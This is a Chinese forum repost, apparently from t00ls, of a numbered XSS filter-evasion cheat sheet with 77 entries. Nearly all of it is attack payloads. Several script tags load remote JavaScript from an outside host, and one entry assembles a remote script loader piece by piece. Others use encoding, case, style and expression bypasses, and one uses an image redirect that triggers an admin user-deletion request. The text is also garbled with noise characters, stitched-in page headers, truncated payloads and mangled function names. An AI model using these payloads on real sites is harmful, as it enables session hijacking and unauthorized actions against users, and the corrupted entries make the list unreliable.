貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 P( Q1 c. }' i2 B9 j. @(1)普通的XSS JavaScript注入
' t) s: x0 u& e" c! h: y; ~9 F/ t<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 f: m+ @4 d" S( h( n! Y(2)IMG标签XSS使用JavaScript命令* O. a7 R% d: E( ?0 x- \! @. g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 w+ P2 S# l6 a+ K2 _/ h2 }& {5 b8 c
(3)IMG标签无分号无引号
3 I4 S6 B- I1 ~" \( v<IMG SRC=javascript:alert(‘XSS’)>
9 s6 O2 e9 d6 q& y) v: q" |(4)IMG标签大小写不敏感* J) `; L1 T( k t+ {4 a
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>. m/ Y/ ?5 ^4 T! p
(5)HTML编码(必须有分号)
. X y3 X \4 O5 K<IMG SRC=javascript:alert(“XSS”)>$ A; E M; j% a/ c
(6)修正缺陷IMG标签& H, F6 U( |- G) O
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>1 T" g9 P: w4 i; P
! C. M! @: _2 ~+ a& F3 F
( \3 y, _* `+ s
(7)formCharCode标签(计算器)+ o$ k# F3 Q& _! c9 @, ^
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. s5 m# _, S) `(8)UTF-8的Unicode编码(计算器)
3 _9 m/ s* p3 `3 E* V% F S<IMG SRC=jav..省略..S')>8 {5 ]; W8 w( c7 j3 A. F/ l* n
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 ^6 E3 n( y7 y* f, A/ I7 P5 `<IMG SRC=jav..省略..S')>8 l% L; O. G' ^# ?7 N; O, Q
(10)十六进制编码也是没有分号(计算器)4 d* ?: c6 k4 G0 }) C. B1 _
<IMG SRC=java..省略..XSS')>
6 C" H) C$ W7 a! v" _4 E2 ^(11)嵌入式标签,将Javascript分开; m/ m% a% T" N0 \6 K
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 U2 E% B2 `! Z' {6 p% v- b
(12)嵌入式编码标签,将Javascript分开
2 W1 A8 x- i+ O: O1 [/ h, R* ]( i<IMG SRC=”jav ascript:alert(‘XSS’);”>" f0 m2 A% ~( r9 C6 f6 l5 O
(13)嵌入式换行符
3 @4 I2 t& M5 ]) g: n<IMG SRC=”jav ascript:alert(‘XSS’);”>$ C4 x% C5 m( W5 }
(14)嵌入式回车
) I; v; v: P0 D- `<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 t) [( r6 Y4 t(15)嵌入式多行注入JavaScript,这是XSS极端的例子; z; L+ r: e. {! p9 i- z$ ~ h6 ]. c
<IMG SRC=”javascript:alert(‘XSS‘)”>' n- M/ }% Q8 E! c1 @& x
(16)解决限制字符(要求同页面)
, ^' b' v0 p% D$ B1 \' A1 w+ b8 B<script>z=’document.’</script>, w b1 g. V: u9 E( }. u! s0 w5 |
<script>z=z+’write(“‘</script>
' C) i4 [0 Y5 p: w<script>z=z+’<script’</script>
. R7 b# i( k& {; L& ~<script>z=z+’ src=ht’</script>
: n' j' K) e9 c" m; e( E<script>z=z+’tp://ww’</script>
: o2 k% ` X) \; d<script>z=z+’w.shell’</script>/ v- I, c7 N* U, j' i2 X8 T) l7 o7 Z* i' P p
<script>z=z+’.net/1.’</script>" {2 _: }' z, h# t
<script>z=z+’js></sc’</script>; e7 \; [4 [8 m" I6 c* Z/ P
<script>z=z+’ript>”)’</script>4 C1 P3 k( T/ U- g7 L: D- [+ K
<script>eval_r(z)</script>* L3 K0 W# E2 t# O9 g+ j- X6 w# e
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
, l0 ^) p' U9 r; d ^https://www.t00ls.net/viewthread ... table&tid=15267 2/6
. V- `1 {0 y3 g: u+ ]& ~' r5 M+ M% \( Dperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
4 c- q P' x" x$ [2 W(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 Y" s2 P+ ?& Q" D" t6 Z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 e, h( u6 K* E
(19)Spaces和meta前的IMG标签
3 s- z4 [; n" n \( H' N<IMG SRC=” javascript:alert(‘XSS’);”>
9 Z( z! }: b; Q; e* l+ A: O( L(20)Non-alpha-non-digit XSS
: C# R }8 f: N* C ^5 R8 S: J<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( D; }% I z) b' J/ ^$ [: D(21)Non-alpha-non-digit XSS to 29 `' ]7 ?/ ~- a7 ?; s& p8 L% ?0 L7 ?6 D
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. U2 u5 q( z" H/ Z(22)Non-alpha-non-digit XSS to 3
6 d- H% ]% w/ L$ Q3 H: `4 T- F& |% U; x<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" u5 g7 }& `% x0 g; `2 S$ u/ ]
(23)双开括号
) C) g0 }9 H8 B' k( Q<<SCRIPT>alert(“XSS”);//<</SCRIPT>; ?( h) B0 n5 b% Z: w$ C5 f
(24)无结束脚本标记(仅火狐等浏览器)- f* ^; c& `1 P
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ {" }) ?, m* g7 k(25)无结束脚本标记2
$ t8 B8 {- G1 F3 X3 r( O<SCRIPT SRC=//3w.org/XSS/xss.js>
) d0 E/ @( X3 i3 w3 p(26)半开的HTML/JavaScript XSS
! {- Q1 z2 T0 T" |' k: P& @<IMG SRC=”javascript:alert(‘XSS’)”
8 W' c( q/ L2 ~& U/ |* x( w# c" V, B(27)双开角括号) g N; B6 J) I5 d; w) y
<iframe src=http://3w.org/XSS.html <
2 |' Y. i8 @8 |$ J(28)无单引号 双引号 分号' q+ l8 Z9 m. \, d: s' Z
<SCRIPT>a=/XSS/
( v2 y6 M2 Z1 A: f& Balert(a.source)</SCRIPT>
: ]# X/ y6 s9 j/ [- W: l(29)换码过滤的JavaScript* H- Q- [6 ~1 l; |5 z
\”;alert(‘XSS’);//: D) ?$ _: v& x* q* C( C
(30)结束Title标签
! G7 w5 G/ D0 S" w! L$ U" Q</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
4 x6 A% O5 Y& z1 L/ k, c(31)Input Image& i7 @+ u/ v) ]( o+ D
<INPUT SRC=”javascript:alert(‘XSS’);”>
G/ \9 k/ W0 d/ R(32)BODY Image
7 \! P, e; \4 q+ p7 s. C<BODY BACKGROUND=”javascript:alert(‘XSS’)”> t d0 c: B" Q1 s
(33)BODY标签, n, ~; A1 d/ y. n4 y$ |1 v7 E @
<BODY(‘XSS’)>
! }) f/ k9 t/ F, L/ S _: d(34)IMG Dynsrc
, E$ A0 _5 ~- z<IMG DYNSRC=”javascript:alert(‘XSS’)”>. E5 m) A, X7 @
(35)IMG Lowsrc9 N7 s2 n* |. Q2 Q. Z# h3 c
<IMG LOWSRC=”javascript:alert(‘XSS’)”>; l; X& g5 f* R K' {- C, V2 x
(36)BGSOUND# q) J2 K* o+ }
<BGSOUND SRC=”javascript:alert(‘XSS’);”>$ W- E& G% |9 @' Z5 i# f
(37)STYLE sheet! N: _4 Z2 S6 x; G3 C( S* @! t
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 l: e1 W. k$ \(38)远程样式表
! I8 {% |0 A3 `7 t2 C; M* \4 K* K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>. l$ D; X- o9 s( q" d8 ?
(39)List-style-image(列表式)( V2 F# k9 {4 g
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS/ S9 \4 f* C$ v9 K3 k: U
(40)IMG VBscript
: l/ _0 y2 D. c<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! m. ]/ X# N3 i4 B" m, }$ n(41)META链接url
3 r3 r& C8 @5 h, c; W7 X) d" f: H9 e3 d
5 {2 U. F/ Y: H" Z<META HTTP-EQUIV=”refresh” CONTENT=”0;
( }: v/ C. o; R( H, xURL=http://;URL=javascript:alert(‘XSS’);”>
% Y* d+ y# t# M( ~8 a$ X' [(42)Iframe
4 v9 O# V3 l* ?<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>6 h& }+ I+ [3 [) l. k5 X- E8 O+ n
(43)Frame' O0 m1 R: W5 L/ r9 i! F3 I3 e
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
% U1 I' e+ q5 H2 H& thttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
& n$ A& O+ m1 a" c- a1 t1 a: J% ]; [(44)Table
2 G2 ]" ]5 x* P0 z. V8 G<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
% s# Z, [! o' \6 e3 _# O; f(45)TD
0 j) x: W0 E0 _3 x1 E" I, G<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
& h/ j+ z' n4 I; C8 d(46)DIV background-image
+ v [) C7 f# O2 c$ y h8 S<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 I6 x' ]9 V, L g, F(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
2 s" @% Z3 U1 f) t& A3 _" x8&13&12288&65279), ^# D, {" v0 m4 @2 t4 N
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 [( ]/ Z! j, U9 v: i! l) a
(48)DIV expression
9 R! h" `8 h. J<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
& D* C$ k; \) V& t9 o7 a(49)STYLE属性分拆表达
2 l5 G$ ^! Y& K3 W) |<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>& y9 {. x$ F' G3 q0 v d- W
(50)匿名STYLE(组成:开角号和一个字母开头)" ]+ O5 P3 s$ v* M3 e
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' ~" Q* w3 ?! A(51)STYLE background-image: ]# H% E) l. t/ P
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
. J" z) w5 [2 ^7 O: W3 }CLASS=XSS></A>
6 [- ^8 U, P, s% \, _! Q; J(52)IMG STYLE方式
1 W6 m- R. g" J0 vexppression(alert(“XSS”))’>
% `( Q' @/ `+ d, S) ^: b' H(53)STYLE background
6 h0 K, I' U5 f E/ ?<STYLE><STYLE
; a6 T6 I3 Q9 G/ ?( C/ I- p- qtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>+ O3 s+ v1 d9 G- g% r
(54)BASE
' h [9 V8 n4 d+ N8 T* l<BASE HREF=”javascript:alert(‘XSS’);//”>/ s2 B' T, \' f
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) t9 o m9 P. v) N6 k/ N6 G<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>, N" k2 n6 \" Y/ l& e7 |) J3 K H" y" X
(56)在flash中使用ActionScrpt可以混进你XSS的代码; b2 w' I5 ]' J* `9 }
a=”get”;
; o }7 O0 F% W2 o3 Hb=”URL(\”";3 f4 a7 R; G( y( D- z
c=”javascript:”;
; p; X. A0 O* m7 @d=”alert(‘XSS’);\”)”;+ e# L* ^; m8 N5 v8 T
eval_r(a+b+c+d);: b" |9 c' s7 N& w( O: z
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上 T0 p( e& S% u. r, k ~
<HTML xmlns:xss>
- Y9 {1 G7 H/ P8 x' C& C0 B<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>0 U% |0 u" C# k8 D3 e2 H2 {. Y T
<xss:xss>XSS</xss:xss>
w: {- V3 g6 Q# a/ ]" @</HTML>. ^2 l3 k8 A$ ~. t' p. l+ a9 w
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
" o$ ?7 L6 E& V; q! h7 }<SCRIPT SRC=””></SCRIPT>+ ^7 i, D) O5 D: a! c& X
(59)IMG嵌入式命令,可执行任意命令
0 H& a' {2 T& O# V3 w<IMG SRC=”http://www.XXX.com/a.php?a=b”>( l R5 Z) @' h0 e! J: ?
(60)IMG嵌入式命令(a.jpg在同服务器)
5 l. Z- T; Q3 m6 F+ L' A: BRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser3 h% I% y& q6 T. J# j1 }5 |
(61)绕符号过滤
7 W+ h( C+ |+ P+ E" x6 B<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>3 ?% t5 ~4 D; J$ P+ v( q4 B
(62)
, |6 |! N6 F7 M p<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>: K x$ o4 E3 D5 C% e1 B6 ^
(63)
+ d' y0 V, i3 t; U; A, ?: I" ~<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& K" @- H' {7 y7 |(64)0 ~; r$ c* F& H, k0 X6 `
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>4 }! W2 c5 X. P8 W8 f# R. K* X# x4 N5 `
(65)
) o" o. q0 ^$ o, T- w2 ?' C<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>, Y% O7 M$ o; m2 w
(66)12-7-1 T00LS - Powered by Discuz! Board
9 I! J4 `) T. Z( Q0 }5 vhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
7 @+ F1 V8 R8 v! c2 M<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>8 x0 y' y" {. ^( `( `, N
(67)
+ F* l# n, K7 x<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>; \ Q# b8 L+ x/ B; q! i/ L
</SCRIPT>
4 u; n" M& z$ O8 U1 N9 G' ]% d(68)URL绕行
! G4 j7 w$ A1 `1 {) \" s<A HREF=”http://127.0.0.1/”>XSS</A>1 U: p- v3 ]- A8 y
(69)URL编码; r5 I* K9 O$ W* r" c( o% A
<A HREF=”http://3w.org”>XSS</A>
7 h6 A# w* n3 `" n6 p- h(70)IP十进制2 f* S, m1 S6 D/ u; P
<A HREF=”http://3232235521″>XSS</A>
/ Q; |* H, w, K+ \- o(71)IP十六进制1 s$ M/ E; m' E9 J! K4 g! U$ \
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>" r$ X& @3 z3 m. [$ B
(72)IP八进制6 y% r$ R/ J# p$ B" L
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
, v- r2 i% ^8 H3 K9 e: F7 E K8 }(73)混合编码
" M! I/ Q5 q; X1 |0 l8 e& n<A HREF=”h( m5 T* _* u' t! L
tt p://6 6.000146.0×7.147/”">XSS</A>' q% b( @( U# c# e* g+ v
(74)节省[http:]
" u. T6 W' |9 n8 w# t1 F# N<A HREF=”//www.google.com/”>XSS</A>
" J# O8 {2 o2 f- M ?(75)节省[www]
" M9 d$ ?2 J$ A* N3 `/ G<A HREF=”http://google.com/”>XSS</A>
. j8 u" _9 a% |' J* l7 S! w(76)绝对点绝对DNS
( R, w2 H. X/ t; d# C; ]6 r) x& E: x Q<A HREF=”http://www.google.com./”>XSS</A>
! w: h. v v8 l(77)javascript链接
2 G6 I6 H" d9 {+ n/ O) @& Z<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
0 b4 g, Q1 N0 C4 Y7 i3 m6 r4 N1 }5 W/ M) _* q3 T: |9 T% J" z- @4 J
原文地址:http://fuzzexp.org/u/0day/?p=14. M5 w ?# o$ Q0 P* `
- l( I: Z$ e7 v, v+ l |
发表于 2013-4-19 19:22:37
收藏
支持
反对